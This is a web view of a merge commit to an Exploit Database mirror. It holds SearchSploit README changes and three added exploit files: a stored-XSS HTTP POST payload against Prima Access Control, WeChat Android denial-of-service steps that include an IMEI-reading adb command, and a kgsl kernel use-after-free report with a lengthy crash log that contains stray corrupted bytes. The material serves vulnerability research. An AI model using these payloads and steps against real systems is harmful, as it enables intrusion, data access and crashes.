bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Merge branch 'master' into misc

Browse source
This commit is contained in:
g0tmi1k 2020-04-06 13:36:23 +01:00 committed by GitHub
commit a5f8a059f5
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1537 changed files with 166536 additions and 318 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

22
README.md
View file

@ -7,12 +7,12 @@ Our repositories are:
- Binary Exploits: [https://github.com/offensive-security/exploitdb-bin-sploits](https://github.com/offensive-security/exploitdb-bin-sploits)
- Papers: [https://github.com/offensive-security/exploitdb-papers](https://github.com/offensive-security/exploitdb-papers)
The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of [exploits](https://www.exploit-db.com/browse/), [shellcode](https://www.exploit-db.com/shellcode/) and [papers](https://www.exploit-db.com/papers/) gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and Proof-of-Concepts rather than advisories, making it a valuable resource for those who need actionable data right away.
You can learn more about the project [here (about)](https://www.exploit-db.com/about-exploit-db/) and [here (history)](https://www.exploit-db.com/history/).
The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of [exploits](https://www.exploit-db.com/), [shellcode](https://www.exploit-db.com/shellcodes) and [papers](https://www.exploit-db.com/papers) gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and Proof-of-Concepts rather than advisories, making it a valuable resource for those who need actionable data right away.
You can learn more about the project [here (Top Right -> About Exploit-DB)](https://www.exploit-db.com/) and [here (History)](https://www.exploit-db.com/history).
This repository is updated daily with the most recently added submissions. Any additional resources can be found in our [binary exploits repository](https://github.com/offensive-security/exploitdb-bin-sploits).
Exploits are located in the `/exploit/` directory, shellcodes can be found in the `/shellcode/` directory.
Exploits are located in the [`/exploits/`](https://github.com/offensive-security/exploitdb/tree/master/exploits) directory, shellcodes can be found in the [`/shellcodes/`](https://github.com/offensive-security/exploitdb/tree/master/shellcodes) directory.
- - -
@ -25,7 +25,7 @@ This project (and SearchSploit) is released under "[GNU General Public License v
# SearchSploit
Included with this repository is the **SearchSploit** utility, which will allow you to search through exploits, shellcodes and papers _(if installed)_ using one or more terms.
For more information, please see the **[SearchSploit manual](https://www.exploit-db.com/searchsploit/)**.
For more information, please see the **[SearchSploit manual](https://www.exploit-db.com/searchsploit)**.
## Usage/Example
@ -42,7 +42,7 @@ root@kali:~# searchsploit -h
searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
searchsploit linux reverse password
For more examples, see the manual: https://www.exploit-db.com/searchsploit/
For more examples, see the manual: https://www.exploit-db.com/searchsploit
=========
Options
@ -62,7 +62,7 @@ root@kali:~# searchsploit -h
--id Display the EDB-ID value rather than local path.
--nmap [file.xml] Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml).
Use "-v" (verbose) to try even more combinations
--exclude="term" Remove values from results. By using "|" to separated you can chain multiple values.
--exclude="term" Remove values from results. By using "|" to separate, you can chain multiple values.
e.g. --exclude="term1|term2|term3".
=======
@ -95,7 +95,7 @@ Shellcodes: No Result
root@kali:~#
root@kali:~# searchsploit -p 39446
Exploit: Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)
URL: https://www.exploit-db.com/exploits/39446/
URL: https://www.exploit-db.com/exploits/39446
Path: /usr/share/exploitdb/exploits/windows_x86/local/39446.py
File Type: Python script, ASCII text executable, with CRLF line terminators
@ -108,9 +108,9 @@ root@kali:~#
## Install
SearchSploit requires either "CoreUtils" or "utilities" (e.g. `bash`, `sed`, `grep`, `awk`, etc.) for the core features to work.
The self updating function will require `git`, and the Nmap XML option to work, will require `xmllint` (found in the `libxml2-utils` package in Debian-based systems).
The self updating function will require `git`, and for the Nmap XML option to work, will require `xmllint` (found in the `libxml2-utils` package in Debian-based systems).
You can find a **more in-depth guide in the [SearchSploit manual](https://www.exploit-db.com/searchsploit/)**.
You can find a **more in-depth guide in the [SearchSploit manual](https://www.exploit-db.com/searchsploit)**.
**Kali Linux**
@ -128,7 +128,7 @@ root@kali:~# apt -y install exploitdb-bin-sploits exploitdb-papers
**Git**
In short: clone the repository, add the binary into $PATH, and edit the config file to reflect the git path:
In short: clone the repository, add the binary into `$PATH`, and edit the config file to reflect the git path:
```
$ sudo git clone https://github.com/offensive-security/exploitdb.git /opt/exploitdb
@ -138,7 +138,7 @@ $ sudo ln -sf /opt/exploitdb/searchsploit /usr/local/bin/searchsploit
**Homebrew**
If you have [homebrew](http://brew.sh/) ([package](https://github.com/Homebrew/homebrew-core/blob/master/Formula/exploitdb.rb), [formula](https://formulae.brew.sh/formula/exploitdb)) installed, running the following will get you setup:
If you have [homebrew](http://brew.sh/) ([package](https://github.com/Homebrew/homebrew-core/blob/master/Formula/exploitdb.rb), [formula](https://formulae.brew.sh/formula/exploitdb)) installed, running the following will get you set up:
```
user@MacBook:~$ brew update && brew install exploitdb

31
exploits/alpha/webapps/47633.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 2.3.35
# Tested on: NA
# CVE : CVE-2019-7671
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Prima Access Control 2.3.35 Authenticated Stored XSS
# PoC
POST /bin/sysfcgi.fx HTTP/1.1
Host: 192.168.13.37
Connection: keep-alive
Content-Length: 265
Origin: https://192.168.13.37
Session-ID: 10127047
User-Agent: Mozi-Mozi/44.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/html, */*; q=0.01
Session-Pc: 2
X-Requested-With: XMLHttpRequest
Referer: https://192.168.13.37/app/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
<requests><request name="CreateDevice"><param name="HwType" value="1000"/><param name="HwParentID" value="0"/><param name="HwLogicParentID" value="0"/><param name="HwName" value=""><script>alert("XSSz")</script>"/></request></requests>

55
exploits/android/dos/46853.txt Normal file
View file

@ -0,0 +1,55 @@
# Exploit Title: DoS Wechat with an emoji
# Date: 16-May-2019
# Exploit Author: Hong Nhat Pham
# Vendor Homepage: http://www.tencent.com/en-us/index.html
# Software Link: https://play.google.com/store/apps/details?id=com.tencent.mm
# Version: 7.0.4
# Tested on: Android 9.0
# CVE : CVE-2019-11419
Description:
vcodec2_hls_filter in libvoipCodec_v7a.so in WeChat application for
Android results in a DoS by replacing an emoji file (under the
/sdcard/tencent/MicroMsg directory) with a crafted .wxgf file.
Crash-log is provided in poc.zip file at
https://drive.google.com/open?id=1HFQtbD10awuUicdWoq3dKVKfv0wvxOKS
Vulnerability Type:
Denial of Service
Vendor of Product:
Tencent
Affected Product Code Base:
WeChat for Android - Up to latest version (7.0.4)
Affected Component:
Function vcodec2_hls_filter in libvoipCodec_v7a.so
Attack Type:
Local
Attack vector:
An malware app can crafts a malicious emoji file and overwrites the
emoji files under /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID].
Once the user opens any chat messages that contain an emoji, WeChat
will instantly crash.
POC:
Video at https://drive.google.com/open?id=1x1Z3hm4j8f4rhv_WUp4gW-bhdtZMezdU
User must have sent or received a GIF file in WeChat
Malware app must retrieve the phones IMEI. For POC, we can use the
below command
adb shell service call iphonesubinfo 1 | awk -F "'" '{print $2}' | sed
'1 d' | tr -d '.' | awk '{print}' ORS=-
Produce the malicious emoji file with the retrieved IMEI (use
encrypt_wxgf.py in poc.zip):
python encrypt.py crash4.wxgf [SIZE_OF_EMOJI_ON_SDCARD]
Replace /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID] with the
padded out.wxgf.encrypted
WeChat will crash now if a message that contains the overwritten emoji file
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46853.zip

295
exploits/android/dos/46941.txt Normal file
View file

@ -0,0 +1,295 @@
The following issue exists in the android-msm-wahoo-4.4-pie branch of
https://android.googlesource.com/kernel/msm (and possibly others):
When kgsl_mem_entry_destroy() in drivers/gpu/msm/kgsl.c is called for a writable
entry with memtype KGSL_MEM_ENTRY_USER, it attempts to mark the entry's pages
as dirty using the function set_page_dirty(). This function first loads
page->mapping using page_mapping(), then calls the function pointer
mapping->a_ops->set_page_dirty.
The bug is that, as explained in upstream commit e92bb4dd9673
( https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e92bb4dd9673945179b1fc738c9817dd91bfb629),
the mapping of a page can be freed concurrently unless it is protected somehow
(e.g. by holding the page lock, or by holding a reference to the mapping).
For callers who don't hold any such lock or reference, set_page_dirty_lock() is
provided to safely mark a page as dirty:
==================================
/*
* set_page_dirty() is racy if the caller has no reference against
* page->mapping->host, and if the page is unlocked. This is because another
* CPU could truncate the page off the mapping and then free the mapping.
*
* Usually, the page _is_ locked, or the caller is a user-space process which
* holds a reference on the inode by having an open file.
*
* In other cases, the page should be locked before running set_page_dirty().
*/
int set_page_dirty_lock(struct page *page)
{
int ret;
lock_page(page);
ret = set_page_dirty(page);
unlock_page(page);
return ret;
}
==================================
To reproduce on a Pixel 2 (walleye):
- Check out the tree specified above.
- Enable KASAN in the kernel config.
- Apply the attached kernel patch kgsl-bigger-race-window.patch to make the
race window much bigger.
- Build and boot the kernel.
- Build the attached poc.c with
`aarch64-linux-gnu-gcc -static -o poc poc.c -Wall`.
- Run the PoC on the device (adb push, then run from adb shell).
You should see a kernel crash like this; note KASAN's report of a UAF in
set_page_dirty():
==================================
<6>[ 445.698708] c3 688 mdss_fb_blank_sub: mdss_fb_blank+0x1d0/0x2b4 mode:0
<3>[ 447.372706] c3 2621 ==================================================================
<3>[ 447.372963] c3 2621 BUG: KASAN: use-after-free in set_page_dirty+0x4c/0xd0
<3>[ 447.380051] c3 2621 Read of size 8 at addr 0000000000000000 by task kworker/3:3/2621
<3>[ 447.387059] c3 2621
<4>[ 447.394762] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45
<4>[ 447.397158] c3 2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
<4>[ 447.406473] c3 2621 Workqueue: kgsl-mementry _deferred_put
<4>[ 447.418479] c3 2621 Call trace:
<4>[ 447.418660] c3 2621 [<ffffffa689e8dfbc>] dump_backtrace+0x0/0x2b4
<4>[ 447.421952] c3 2621 [<ffffffa689e8e394>] show_stack+0x14/0x1c
<4>[ 447.428066] c3 2621 [<ffffffa68a2f3d2c>] dump_stack+0xa4/0xcc
<4>[ 447.433965] c3 2621 [<ffffffa68a07b254>] print_address_description+0x94/0x340
<4>[ 447.439870] c3 2621 [<ffffffa68a07b784>] kasan_report+0x1f8/0x340
<4>[ 447.447145] c3 2621 [<ffffffa68a079a10>] __asan_load8+0x74/0x90
<4>[ 447.453407] c3 2621 [<ffffffa68a0205b4>] set_page_dirty+0x4c/0xd0
<4>[ 447.459621] c3 2621 [<ffffffa68a6c5dec>] kgsl_mem_entry_destroy+0x1c0/0x218
<4>[ 447.465695] c3 2621 [<ffffffa68a6c63d8>] _deferred_put+0x34/0x3c
<4>[ 447.473017] c3 2621 [<ffffffa689edc124>] process_one_work+0x254/0x78c
<4>[ 447.479093] c3 2621 [<ffffffa689edc6f4>] worker_thread+0x98/0x718
<4>[ 447.485551] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130
<4>[ 447.491801] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40
<3>[ 447.497696] c3 2621
<3>[ 447.503818] c3 2621 Allocated by task 2684:
<4>[ 447.506206] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8
<4>[ 447.511847] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20
<4>[ 447.517829] c3 2621 [<ffffffa68a079e74>] kasan_kmalloc.part.5+0x50/0x124
<4>[ 447.523494] c3 2621 [<ffffffa68a07a198>] kasan_kmalloc+0xc4/0xe4
<4>[ 447.529547] c3 2621 [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c
<4>[ 447.534931] c3 2621 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c
<4>[ 447.540572] c3 2621 [<ffffffa68a187bdc>] ext4_alloc_inode+0x28/0x234
<4>[ 447.546387] c3 2621 [<ffffffa68a0afe94>] alloc_inode+0x34/0xd0
<4>[ 447.552112] c3 2621 [<ffffffa68a0b19e8>] new_inode+0x20/0xe8
<4>[ 447.557318] c3 2621 [<ffffffa68a154214>] __ext4_new_inode+0xe8/0x1f00
<4>[ 447.562360] c3 2621 [<ffffffa68a17087c>] ext4_tmpfile+0xb4/0x230
<4>[ 447.568172] c3 2621 [<ffffffa68a09f9e8>] path_openat+0x934/0x1404
<4>[ 447.573556] c3 2621 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188
<4>[ 447.579027] c3 2621 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4
<4>[ 447.584407] c3 2621 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18
<4>[ 447.589787] c3 2621 [<ffffffa689e842b0BCho<D5>
^@^@<90>^A,^A^Hp<D6>M>] el0_svc_naked+0x24/0x28
<3>[ 447.594909] c3 2621
<3>[ 447.599065] c3 2621 Freed by task 36:
<4>[ 447.601330] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8
<4>[ 447.606461] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20
<4>[ 447.612450] c3 2621 [<ffffffa68a07aa1c>] kasan_slab_free+0xb0/0x1c0
<4>[ 447.618091] c3 2621 [<ffffffa68a0770c0>] kmem_cache_free+0x80/0x2f8
<4>[ 447.623733] c3 2621 [<ffffffa68a1863f8>] ext4_i_callback+0x18/0x20
<4>[ 447.629363] c3 2621 [<ffffffa689f5c430>] rcu_nocb_kthread+0x20c/0x264
<4>[ 447.634926] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130
<4>[ 447.640726] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40
<3>[ 447.645765] c3 2621
<3>[ 447.649913] c3 2621 The buggy address belongs to the object at 0000000000000000
<3>[ 447.649913] c3 2621 which belongs to the cache ext4_inode_cache of size 1048
<3>[ 447.652315] c3 2621 The buggy address is located 680 bytes inside of
<3>[ 447.652315] c3 2621 1048-byte region [0000000000000000, 0000000000000000)
<3>[ 447.667170] c3 2621 The buggy address belongs to the page:
<1>[ 447.680933] c3 2621 Unable to handle kernel paging request at virtual address ffffffd8929b3000
<1>[ 447.686392] c3 2621 pgd = 0000000000000000
<1>[ 447.695099] c3 2621 [ffffffd8929b3000] *pgd=0000000000000000, *pud=0000000000000000
<4>[ 447.706506] c3 2621 ------------[ cut here ]------------
<2>[ 447.706664] c3 2621 Kernel BUG at 0000000000000000 [verbose debug info unavailable]
<0>[ 447.711676] c3 2621 Internal error: Oops - BUG: 96000047 [#1] PREEMPT SMP
<4>[ 447.719517] c3 2621 Modules linked in:
<4>[ 447.729365] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45
<4>[ 447.729573] c3 2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
<4>[ 447.738760] c3 2621 Workqueue: kgsl-mementry _deferred_put
<4>[ 447.750779] c3 2621 task: 0000000000000000 task.stack: 0000000000000000
<4>[ 447.750972] c3 2621 PC is at el1_sync+0x28/0xe0
<4>[ 447.757719] c3 2621 LR is at dump_page+0x10/0x18
<4>[ 447.762390] c3 2621 pc : [<ffffffa689e836e8>] lr : [<ffffffa68a04d9dc>] pstate: 204003c5
<4>[ 447.767106] c3 2621 sp : ffffffd8929b2f60
<4>[ 447.775306] c3 2621 x29: ffffffd8929b4000 x28: ffffffd88e9a47d0
<4>[ 447.784631] c3 2621 x27: ffffffd8294fab80 x26: ffffffa68ba1f000
<4>[ 447.789927] c3 2621 x25: ffffffd8536fc908 x24: ffffffd8536fc4e8
<4>[ 447.795219] c3 2621 x23: ffffffd892e55500 x22: 0000000000000001
<4>[ 447.800513] c3 2621 x21: ffffffa68ba1aa00 x20: 0000000000000000
<4>[ 447.805809] c3 2621 x19: ffffffbe214dbe00 x18: 0000007f7dc4ef8a
<4>[ 447.811105] c3 2621 x17: 0000007f809eb0e0 x16: ffffffa68a0a5178
<4>[ 447.816400] c3 2621 x15: 0000000000000021 x14: 202c303030303030
<4>[ 447.821694] c3 2621 x13: 3030303030303030 x12: e95cc056ac940c73
<4>[ 447.826992] c3 2621 x11: ffffffd8929fb810 x10: ffffff8b12978008
<4>[ 447.832286] c3 2621 x9 : ffffff8b12978007 x8 : ffffffa68a21a558
<4>[ 447.837590] c3 2621 x7 : ffffffa68c69ec28 x6 : 0000000000000040
<4>[ 447.842872] c3 2621 x5 : 0000000000000000 x4 : ffffff87c429b7c0
<4>[ 447.848170] c3 2621 x3 : ffffffa68a04d8dc x2 : 0000000000000000
<4>[ 447.853468] c3 2621 x1 : ffffffa68ba1aa00 x0 : ffffffbe214dbe00
<4>[ 447.858765] c3 2621
<4>[ 447.858765] c3 2621 PC: 0xffffffa689e836a8:
<4>[ 447.859009] c3 2621 36a8 d503201f d503201f d503201f d503201f d503201f d503201f a90007e0 a9010fe2
<4>[ 447.873684] c3 2621 36c8 a90217e4 a9031fe6 a90427e8 a9052fea a90637ec a9073fee a90847f0 a9094ff2
<4>[ 447.881847] c3 2621 36e8 a90a57f4 a90b5ff6 a90c67f8 a90d6ffa a90e77fc 9104c3f5 d538411c f9400794
<4>[ 447.890005] c3 2621 3708 f90093f4 d2c01014 f9000794 d5384036 d5384017 a90f57fe d503201f d5382015
<4>[ 447.898172] c3 2621
<4>[ 447.898172] c3 2621 LR: 0xffffffa68a04d99c:
<4>[ 447.898371] c3 2621 d99c b000ce80 9113e000 97feface aa1303e0 9400affc f9400260 9117e2e1 528002a2
<4>[ 447.91300BCho<D6>
^@^@<90>^A+^A<98>3<8E><DA>8] c3 2621 d9bc 9106c021 8a000280 97ffff2c 17ffffe6 a9bf7bfd d2800002 910003fd 97ffffb4
<4>[ 447.921170] c3 2621 d9dc a8c17bfd d65f03c0 a9ac7bfd 910003fd a90153f3 a9025bf5 a90363f7 a9046bf9
<4>[ 447.929328] c3 2621 d9fc a90573fb d10443ff aa0003f3 9400afe5 aa1303e0 f8410402 f90033a2 9400af97
<4>[ 447.937494] c3 2621
<4>[ 447.937494] c3 2621 SP: 0xffffffd8929b2f20:
<4>[ 447.937693] c3 2621 2f20 8a04d9dc ffffffa6 929b2f60 ffffffd8 89e836e8 ffffffa6 204003c5 00000000
<4>[ 447.952331] c3 2621 2f40 00000000 00000000 00000000 00000000 ffffffff ffffffff 00000000 00000000
<4>[ 447.960491] c3 2621 2f60 214dbe00 ffffffbe 8ba1aa00 ffffffa6 00000000 00000000 8a04d8dc ffffffa6
<4>[ 447.968651] c3 2621 2f80 c429b7c0 ffffff87 00000000 00000000 00000040 00000000 8c69ec28 ffffffa6
<4>[ 447.976809] c3 2621
<0>[ 447.976941] c3 2621 Process kworker/3:3 (pid: 2621, stack limit = 0x0000000000000000)
<4>[ 447.979247] c3 2621 Call trace:
<4>[ 447.987122] c3 2621 Exception stack(0xffffffd8929b2d60 to 0xffffffd8929b2e90)
<4>[ 447.990662] c3 2621 2d60: ffffffbe214dbe00 0000008000000000 00000000836e2000 ffffffa689e836e8
<4>[ 447.997788] c3 2621 2d80: 00000000204003c5 0000000000000025 ffffffd8536fc908 0000000000000000
<4>[ 448.006468] c3 2621 2da0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
<4>[ 448.015098] c3 2621 2dc0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
<4>[ 448.023777] c3 2621 2de0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
<4>[ 448.032461] c3 2621 2e00: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
<4>[ 448.041195] c3 2621 2e20: 0000000000000000 e95cc056ac940c73 ffffffbe214dbe00 ffffffa68ba1aa00
<4>[ 448.049872] c3 2621 2e40: 0000000000000000 ffffffa68a04d8dc ffffff87c429b7c0 0000000000000000
<4>[ 448.058561] c3 2621 2e60: 0000000000000040 ffffffa68c69ec28 ffffffa68a21a558 ffffff8b12978007
<4>[ 448.067216] c3 2621 2e80: ffffff8b12978008 ffffffd8929fb810
<4>[ 448.075867] c3 2621 [<ffffffa689e836e8>] el1_sync+0x28/0xe0
<0>[ 448.081787] c3 2621 Code: a90637ec a9073fee a90847f0 a9094ff2 (a90a57f4)
<4>[ 448.087496] c3 2621 ---[ end trace 8d4b2347f8b71fe7 ]---
<4>[ 448.087540] c4 2684 ------------[ cut here ]------------
<2>[ 448.087544] c4 2684 Kernel BUG at 0000000000000000 [verbose debug info unavailable]
<0>[ 448.087547] c4 2684 Internal error: Oops - BUG: 96000005 [#2] PREEMPT SMP
<4>[ 448.087553] c4 2684 Modules linked in:
<4>[ 448.087561] c4 2684 CPU: 4 PID: 2684 Comm: poc Tainted: G D 4.4.116-gbcd0ecccd040-dirty #45
<4>[ 448.087563] c4 2684 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
<4>[ 448.087565] c4 2684 task: 0000000000000000 task.stack: 0000000000000000
<4>[ 448.087578] c4 2684 PC is at qlist_free_all+0x3c/0x80
<4>[ 448.087581] c4 2684 LR is at qlist_free_all+0x7c/0x80
<4>[ 448.087585] c4 2684 pc : [<ffffffa68a07bbbc>] lr : [<ffffffa68a07bbfc>] pstate: 60400145
<4>[ 448.087586] c4 2684 sp : ffffffd87e3b3880
<4>[ 448.087591] c4 2684 x29: ffffffd87e3b3880 x28: ffffffa68ca1a000
<4>[ 448.087595] c4 2684 x27: 000000000591e848 x26: ffffffd87e3b3920
<4>[ 448.087598] c4 2684 x25: 0000000000000140 x24: 0000000000000000
<4>[ 448.087601] c4 2684 x23: ffffffd87e3b3920 x22: ffffffa68a07bbbc
<4>[ 448.087604] c4 2684 x21: 0000000000000000 x20: ffffffd8929f8040
<4>[ 448.087607] c4 2684 x19: ffffffd8929f8040 x18: 00000000c8056d20
<4>[ 448.087611] c4 2684 x17: 000000002c754130 x16: 0000000085837409
<4>[ 448.087613] c4 2684 x15: 00000000a50d5ad3 x14: 0000000000000000
<4>[ 448.087617] c4 2684 x13: 0000000001075000 x12: ffffffffffffffff
<4>[ 448.087620] c4 2684 x11: 0000000000000040 x10: ffffff8b0fc76746
<4>[ 448.087623] c4 2684 x9 : ffffff8b0fc76745 x8 : ffffffd87e3b3a2b
<4>[ 448.087626] c4 2684 x7 : 0000000000000000 x6 : ffffffd87e3b3a08
<4>[ 448.087629] c4 2684 x5 : fffffffffe8c0000 x4 : 0000000000000000
<4>[ 448.087632] c4 2684 x3 : fBCho<D7>
^@^@<90>^A*^A<91><F9>%5fffffd8929f7ff0 x2 : 0000000000000000
<4>[ 448.087635] c4 2684 x1 : dead0000000000ff x0 : 0000000000000000
<4>[ 448.087637] c4 2684
<4>[ 448.087637] c4 2684 PC: 0xffffffa68a07bb7c:
<4>[ 448.087646] c4 2684 bb7c 17fffff1 a9bc7bfd 910003fd a90153f3 a9025bf5 f9001bf7 f9400013 b4000253
<4>[ 448.087655] c4 2684 bb9c 90000016 aa0103f5 aa0003f7 912ef2d6 14000002 aa1403f3 aa1503e0 b40001f5
<4>[ 448.087664] c4 2684 bbbc b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff
<4>[ 448.087673] c4 2684 bbdc f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93
<4>[ 448.087675] c4 2684
<4>[ 448.087675] c4 2684 LR: 0xffffffa68a07bbbc:
<4>[ 448.087684] c4 2684 bbbc b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff
<4>[ 448.087692] c4 2684 bbdc f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93
<4>[ 448.087701] c4 2684 bbfc 17fffff0 a9bc7bfd aa0003e2 910003fd a90153f3 f0012ed3 aa0003f4 b000eb40
<4>[ 448.087711] c4 2684 bc1c 910083a1 d538d083 913c8000 f90013bf 8b000060 f9452a63 f9001fa3 f90017bf
<4>[ 448.087712] c4 2684
<4>[ 448.087712] c4 2684 SP: 0xffffffd87e3b3840:
<4>[ 448.087722] c4 2684 3840 8a07bbfc ffffffa6 7e3b3880 ffffffd8 8a07bbbc ffffffa6 60400145 00000000
<4>[ 448.087731] c4 2684 3860 7e3b3920 ffffffd8 00000000 00000000 00000000 00000080 8b4ddfd0 ffffffa6
<4>[ 448.087740] c4 2684 3880 7e3b38c0 ffffffd8 8a07bf9c ffffffa6 8c656000 ffffffa6 8ca1f500 ffffffa6
<4>[ 448.087749] c4 2684 38a0 8ca1a000 ffffffa6 000000f7 00000000 8c68d000 ffffffa6 fabb3a00 ffffffd7
<4>[ 448.087750] c4 2684
<0>[ 448.087753] c4 2684 Process poc (pid: 2684, stack limit = 0x0000000000000000)
<4>[ 448.087754] c4 2684 Call trace:
<4>[ 448.087758] c4 2684 Exception stack(0xffffffd87e3b3680 to 0xffffffd87e3b37b0)
<4>[ 448.087763] c4 2684 3680: ffffffd8929f8040 0000008000000000 00000000836e2000 ffffffa68a07bbbc
<4>[ 448.087768] c4 2684 36a0: 0000000060400145 0000000000000025 0000000000000140 ffffffd7fabb3a00
<4>[ 448.087773] c4 2684 36c0: 0000000000000000 ffffffd87e3b37d0 ffffffd87e3b3720 ffffffa68a0768e0
<4>[ 448.087779] c4 2684 36e0: ffffffbe224a7d80 0000000000000000 ffffffd7fabb3a00 ffffffd7fabb3a00
<4>[ 448.087784] c4 2684 3700: 0000000100150015 ffffffd8929f7e00 0000000180150014 ffffffd899803b00
<4>[ 448.087789] c4 2684 3720: ffffffd87e3b3830 ffffffa68a078b38 ffffffbe224a7d80 ffffffd8929f7ff0
<4>[ 448.087794] c4 2684 3740: ffffffd7fabb3a00 e95cc056ac940c73 0000000000000000 dead0000000000ff
<4>[ 448.087799] c4 2684 3760: 0000000000000000 ffffffd8929f7ff0 0000000000000000 fffffffffe8c0000
<4>[ 448.087804] c4 2684 3780: ffffffd87e3b3a08 0000000000000000 ffffffd87e3b3a2b ffffff8b0fc76745
<4>[ 448.087808] c4 2684 37a0: ffffff8b0fc76746 0000000000000040
<4>[ 448.087813] c4 2684 [<ffffffa68a07bbbc>] qlist_free_all+0x3c/0x80
<4>[ 448.087819] c4 2684 [<ffffffa68a07bf9c>] quarantine_reduce+0x17c/0x1a0
<4>[ 448.087824] c4 2684 [<ffffffa68a07a1b4>] kasan_kmalloc+0xe0/0xe4
<4>[ 448.087828] c4 2684 [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c
<4>[ 448.087832] c4 2684 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c
<4>[ 448.087840] c4 2684 [<ffffffa68a15d0dc>] ext4_inode_attach_jinode+0x9c/0x118
<4>[ 448.087844] c4 2684 [<ffffffa68a150d74>] ext4_file_open+0xc8/0x21c
<4>[ 448.087848] c4 2684 [<ffffffa68a087488>] do_dentry_open+0x350/0x4ec
<4>[ 448.087851] c4 2684 [<ffffffa68a087930>] finish_open+0x74/0xa8
<4>[ 448.087857] c4 2684 [<ffffffa68a09fa34>] path_openat+0x980/0x1404
<4>[ 448.087861] c4 2684 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188
<4>[ 448.087866] c4 2684 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4
<4>[ 448.087869] c4 2684 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18
<4>[ 448.087875] c4 2684 [<ffffffa689e842b0>] el0_svc_naked+0x24/0x28
<0>[ 448.087881] c4 2684 Code: 14000002 aa1403f3 aa1503e0 b40001f5 (b980c401)
<4>[ 448.087944] c4 2684 ---[ end trace 8d4DBGC
==================================
The KASAN report points to instruction 267c in the following assembly:
==================================
0000000000002630 <set_page_dirty>:
{
2630: a9bd7bfd stp x29, x30, [sp, #-48]!
2634: 910003fd mov x29, sp
2638: a90153f3 stp x19, x20, [sp, #16]
263c: f90013f5 str x21, [sp, #32]
2640: aa0003f3 mov x19, x0
struct address_space *mapping = page_mapping(page);
2644: 94000000 bl 0 <page_mapping>
2648: aa0003f4 mov x20, x0
264c: d5384115 mrs x21, sp_el0
if (current->jh_task_flags && mapping)
2650: 9128a2a0 add x0, x21, #0xa28
2654: 94000000 bl 0 <__asan_load4>
2658: b94a2aa0 ldr w0, [x21, #2600]
265c: 340000a0 cbz w0, 2670 <set_page_dirty+0x40>
2660: b40003b4 cbz x20, 26d4 <set_page_dirty+0xa4>
msleep(500);
2664: 52803e80 mov w0, #0x1f4 // #500
2668: 94000000 bl 0 <msleep>
266c: 14000002 b 2674 <set_page_dirty+0x44>
if (likely(mapping)) {
2670: b4000334 cbz x20, 26d4 <set_page_dirty+0xa4>
int (*spd)(struct page *) = mapping->a_ops->set_page_dirty;
2674: 9101a280 add x0, x20, #0x68
2678: 94000000 bl 0 <__asan_load8>
267c: f9403694 ldr x20, [x20, #104]
2680: 91006280 add x0, x20, #0x18
